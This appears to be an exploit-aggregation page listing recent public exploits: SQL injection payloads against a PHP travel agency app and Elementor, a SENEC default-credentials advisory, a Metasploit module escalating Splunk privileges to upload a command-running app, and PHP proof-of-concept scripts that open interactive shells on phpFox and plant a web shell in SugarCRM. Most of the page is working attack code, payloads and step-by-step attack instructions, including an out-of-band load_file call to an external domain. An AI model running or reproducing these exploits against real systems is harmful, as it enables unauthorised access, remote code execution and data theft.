Latest exploits :: CodePwn

<pre><code>## Title: travel-1.0-by-oretnom23 Multiple-SQLi ## Author: nu11secur1ty ## Date: 11/12/2023 ## Vendor: https://github.com/oretnom23 ## Software: https://github.com/oretnom23/php-travel-agency-system ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The search parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+' was submitted in the search parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```MySQL --- Parameter: search (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: search=951531'+(select load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'' RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(select load_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+'' ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: search=951531'+(select load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'' OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND 'fGlq'='fGlq&searc=&sumbit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 28 columns Payload: search=951531'+(select load_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html) ## Time spent: 00:17:00 </code></pre>

<pre><code> #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders Open Burp Suite. In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request. Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward". The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection. Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/ Exploit Python : The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection. Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payload url = "http://localhost:8080/wp-admin/admin-ajax.php" data = { "action": "elementor_ajax_save_builder", "editor_post_id": "1", "post_id": "1", "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#" } # Send the request to the target URL response = requests.post(url, data=data) # Check if the response indicates a successful SQL injection if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text: print("SQL Injection successful!") else: print("SQL Injection failed.") </code></pre>

<pre><code>Advisory ID: Ph0s-2023-004 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Version(s): Firmware: all (as of 2023-06-19) Tested Version(s): current Vulnerability Type: CWE-1392: Use of Default Credentials Risk Level: CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical) Manufacturer Risk Level Rating: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C Overall CVSS Score: 8.6 Solution Status: Fixed Manufacturer Notification: 2023-06-05 Public Disclosure: 2023-11-01 CVE Reference: CVE-2023-39170 Author of Advisory: Ph0s[4], R0ckE7 ******************************************************************************** Overview: Foreword: This vulnerability was reported to the enbw-cert. we would like to thank enbw-cert for taking care of the vulns and patch the systems. we decided to publish when most of the reported vulns are patched to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. About Senec: We are SENEC We have been the EnBW energy independence experts since 2018 – but we have put our heart and soul into guiding customers on the route to independence since SENEC was founded in 2009. Our passion lies in actively promoting the energy transition with innovative ideas and pioneering products. And, because we don’t do things by halves, our unwavering ambition is to create integrated solutions that enable you to enjoy the highest possible degree of independence and sustainability through self-generation of solar electricity. About SENEC Home: SENEC.Home: The smart electricity storage device for your home SENEC.Home is the heart of the your sustainable, affordable supply of solar electricity. The smart battery storage device stores excess electricity generated by your PV system so that you can use it when you need it – such as when your household’s energy consumption rises in the evening, or on rainy days when your PV system generates less power. ******************************************************************************** Vulnerability Details: The credentials for the senec inverters are known in public. ******************************************************************************** Proof of Concept (PoC): The attack consists of the following steps: 1. use google to optain them, eg: https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Patched by Manufacturer (Rolled out until September 11, 2023) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-06-01: Vulnerability discovered 2023-06-05: Vulnerability reported to manufacturer 2023-09-11: Patch rollout by manufacturer to affected devices 2023-11-01: Public disclosure of vulnerability ************************************************************************ Researcher: Ph0s[4], R0ckE7 ************************************************************************ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient attr_accessor :cookie def initialize(info = {}) super( update_info( info, 'Name' => 'Splunk "edit_user" Capability Privilege Escalation', 'Description' => %q{ A low-privileged user who holds a role that has the "edit_user" capability assigned to it can escalate their privileges to that of the admin user by providing a specially crafted web request. This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf configuration file, which prevents this scenario from happening. This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE. }, 'Author' => [ 'Mr Hack (try_to_hack) Santiago Lopez', # discovery 'Heyder Andrade', # metasploit module 'Redway Security <redwaysecurity.com>' # Writeup and PoC ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2023-32707' ], [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true }, 'Platform' => %w[linux unix win osx], 'Targets' => [ [ 'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux', { 'Arch' => ARCH_CMD, 'Platform' => %w[linux unix], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python', # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:' 'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME' } } ], [ 'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8000, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ IOC_IN_LOGS, # requests are logged in the _audit index # ARTIFACTS_ON_DISK # app is removed in the cleanup method ] }, 'DisclosureDate' => '2023-06-01' ) ) register_options( [ OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']), OptString.new('PASSWORD', [true, 'The password for the specified username']), OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']), OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]), OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')]) ] ) # That depends on finding a strategy to distinguish commands that return output and commands that don't # register_advanced_options( # [ # OptBool.new('ReturnOutput', [ true, 'Display command output', false ]) # ] # ) end def check splunk_login(datastore['USERNAME'], datastore['PASSWORD']) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']), 'method' => 'GET', 'cookie' => cookie, 'vars_get' => { 'output_mode' => 'json' } }) return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200 body = res.get_json_document version = Rex::Version.new(body['generator']['version']) return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless ( (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) || (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) || (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14')) ) print_status("Detected Splunk version #{version} which is vulnerable") capabilities = body['entry'].first['content']['capabilities'] return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user' report_vuln( host: rhost, name: name, refs: references, info: [version] ) CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability") end def app_name datastore['APP_NAME'] end # The cleanup method is removing the app before the session is closed and it is broking the session. # def cleanup return unless session_created? super # Destroy job vprint_status("Cleaning up: destroying job #{@job_id}") send_request_cgi({ 'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id), 'method' => 'DELETE', 'cookie' => cookie }) # Remove app vprint_status("Cleaning up: removing app #{app_name}") execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'), 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { 'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000'] } }) end def exploit splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD']) splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD']) splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE']) @job_id = execute_command(payload.encoded, { app_name: app_name }) # TODO: distinguish commands that return output and commands that don't # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output' && !datastore['ReturnOutput'] # if datastore['ReturnOutput'] # print_status('Waiting for command output') # print_line(splunk_fetch_job_output) # end end def execute_command(cmd, opts = {}) res = send_request_cgi({ 'uri' => '/en-US/api/search/jobs', 'method' => 'POST', 'cookie' => cookie, 'headers' => { 'X-Requested-With' => 'XMLHttpRequest', 'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'] }, 'vars_post' => { 'auto_cancel' => '62', 'status_buckets' => '300', 'output_mode' => 'json', 'search' => "| #{app_name} #{Rex::Text.encode_base64(cmd)}", 'earliest_time' => '-1@h', 'latest_time' => 'now', 'ui_dispatch_app' => (opts[:app_name]).to_s } }) fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200 body = res.get_json_document fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data'] body['data'] end def splunk_helper_extract_token(uri) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, uri), 'method' => 'GET', 'keep_cookies' => true }) fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200 "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies end def splunk_login(username, password) # gets cval and splunkweb_uid cookies self.cookie = splunk_helper_extract_token('/en-US/account/login') # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/en-US/account/login'), 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { 'username' => username, 'password' => password, 'cval' => cookies_hash['cval'] } }) fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200 cookie << " #{res.get_cookies}" end def splunk_change_password(username, password) # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set do_login(username, password) unless cookie print_status("Changing '#{username}' password to #{password}") res = send_request_cgi({ 'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username), 'method' => 'POST', 'headers' => { 'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'], 'X-Requested-With' => 'XMLHttpRequest' }, 'cookie' => cookie, 'vars_post' => { 'output_mode' => 'json', 'password' => password, 'force-change-pass' => 0, 'locked-out' => 0 } }) fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200 print_good("Password of the user '#{username}' has been changed to #{password}") body = res.get_json_document capabilities = body['entry'].first['content']['capabilities'] fail_with(Failure::BadConfig, "The user '#{username}' does not have 'install_app' capability. You may consider to target other user") unless capabilities.include? 'install_apps' end def splunk_upload_app(app_name, _file_name) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'), 'method' => 'GET', 'cookie' => cookie }) fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200 html = res.get_html_document print_status("Uploading file #{app_name}") data = Rex::MIME::Message.new # fill the hidden fields from the form: state and splunk_form_key html.at('[id="installform"]').elements.each do |form| next unless form.attributes['value'] data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"") end data.add_part('1', nil, nil, 'form-data; name="force"') data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"") post_data = data.to_s res = send_request_cgi({ 'uri' => '/en-US/manager/appinstall/_upload', 'method' => 'POST', 'cookie' => cookie, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) print_good("#{app_name} successfully uploaded") end # def splunk_fetch_job_output # res = send_request_cgi({ # 'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"), # 'method' => 'GET', # 'keep_cookies' => true, # 'cookie' => cookie, # 'vars_get' => { # 'output_mode' => 'json' # } # }) # fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200 # body = res.get_json_document # fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty? # Rex::Text.decode_base64(body['results'].first['result']) # end def splunk_app # metadata folder metadata = <<~EOF [commands] export = system EOF # default folder commands_conf = <<~EOF [#{app_name}] type = python filename = #{app_name}.py local = false enableheader = false streaming = false perf_warn_limit = 0 EOF app_conf = <<~EOF [launcher] author=#{Faker::Name.name} description=#{Faker::Lorem.sentence} version=#{Faker::App.version} [ui] is_visible = false EOF # bin folder msf_exec_py = <<~EOF import sys, base64, subprocess import splunk.Intersplunk header = ['result'] results = [] try: proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output = proc.stdout.read().decode('utf-8') results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')}) except Exception as e: error_msg = f'Error : {str(e)} ' results = splunk.Intersplunk.generateErrorResults(error_msg) splunk.Intersplunk.outputResults(results, fields=header) EOF tarfile = StringIO.new Rex::Tar::Writer.new tarfile do |tar| tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io| io.write metadata end tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io| io.write commands_conf end tar.add_file("#{app_name}/default/app.conf", 0o644) do |io| io.write app_conf end tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io| io.write msf_exec_py end end tarfile.rewind tarfile.close Rex::Text.gzip(tarfile.string) end def cookies_hash cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip } end end </code></pre>

<pre><code>-------------------------------------------------------------- phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability -------------------------------------------------------------- [-] Software Link: https://www.phpfox.com [-] Affected Versions: Version 4.8.13 and prior versions. [-] Vulnerability Description: User input passed through the "url" request parameter to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2023-46817.php (Packet Storm note: POC included at bottom) [-] Solution: Upgrade to version 4.8.14 or later. [-] Disclosure Timeline: [05/10/2023] - Vendor contacted through https://clients.phpfox.com [05/10/2023] - Vendor response stating "we currently do not have such security requirements" [06/10/2023] - CVE identifier requested [09/10/2023] - Vulnerability details shared with the vendor, stating the issue is quite critical [17/10/2023] - Vendor contacted again, asking for an update [18/10/2023] - Vendor response stating "this issue is fixed in our latest version (4.8.13)", but that's not the truth [26/10/2023] - Version 4.8.14 released [27/10/2023] - CVE identifier assigned [27/10/2023] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46817 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-12 [-] Other References: https://docs.phpfox.com/display/FOX4MAN/phpFox+4.8.14 --- CVE-2023-46817.php poc --- <?php /* -------------------------------------------------------------- phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability -------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.phpfox.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "url" request parameter to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-12 */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[+] cURL extension required!\n"); print "+------------------------------------------------------------------+\n"; print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n"; print "+------------------------------------------------------------------+\n"; if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n"); function encode($string) { $string = addslashes(gzcompress($string, 9)); return urlencode(strtr(base64_encode($string), '+/=', '-_,')); } class Phpfox_Request { private $_sName = "EgiX"; private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;"; } class Core_Objectify { private $__toString; function __construct($callback) { $this->__toString = $callback; } } print "\n[+] Launching shell on {$argv[1]}\n"; $popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"])); $popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain)); while(1) { print "\nphpFox-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n"); } </code></pre>

<pre><code>------------------------------------------------------------------------------- SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload Vulnerability ------------------------------------------------------------------------------- [-] Software Link: https://www.sugarcrm.com [-] Affected Versions: Version 13.0.1 and prior versions. Version 12.0.3 and prior versions. [-] Vulnerability Description: When handling the "set_note_attachment" SOAP call, the application allows uploading of any kind of file into /upload/ directory. This one is protected by the main SugarCRM .htaccess file, i.e. it doesn't allow access/execution of PHP files. However, this behavior can be overridden if the subdirectory contains another .htaccess file. So, an attacker can leverage the vulnerability to firstly upload a new .htaccess file and then to upload the PHP code they want to execute. [-] Proof of Concept: https://karmainsecurity.com/pocs/KIS-2023-11.php (Packet Storm note: POC included at bottom) [-] Solution: Upgrade to version 13.0.2, 12.0.4, or later. [-] Disclosure Timeline: [23/04/2023] - Vendor notified [21/09/2023] - Fixed versions released [06/10/2023] - CVE identifier requested [26/10/2023] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a CVE identifier for this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-11 [-] Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/ --- KIS-2023-11.php poc --- <?php set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[+] cURL extension required!\n"); if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n"); list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[+] Logging in with username '{$user}' and password '{$pass}'\n"; $ch = curl_init(); $params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"]; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token"); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params)); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n"); print "[+] Creating new Notes bean (ID: .htaccess)\n"; $note_id = ".htaccess"; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes"); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id])); if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n"); print "[+] Creating new Notes bean (ID: sh.php)\n"; $note_id = "sh.php"; curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id])); if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n"); require_once("./lib/nusoap.php"); $client = new nusoap_client("{$url}soap.php", false); if (($err = $client->getError())) { echo "\nConstructor error: $err"; echo "\nDebug: " . $client->getDebug() . "\n"; die(); } print "[+] Sending SOAP login request\n"; $params = ["user_auth" => ["user_name" => $user, "password" => $pass]]; $session = $client->call('login', $params); if ($session['id'] == -1) die("[+] SOAP login failed!\n"); print "[+] Uploading .htaccess through 'set_note_attachment'\n"; $htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\""; $params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]]; $client->call("set_note_attachment", $params); print "[+] Uploading shell through 'set_note_attachment'\n"; $shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>"; $params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]]; $client->call("set_note_attachment", $params); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php"); while(1) { print "\nsugar-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]); ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n"); } </code></pre>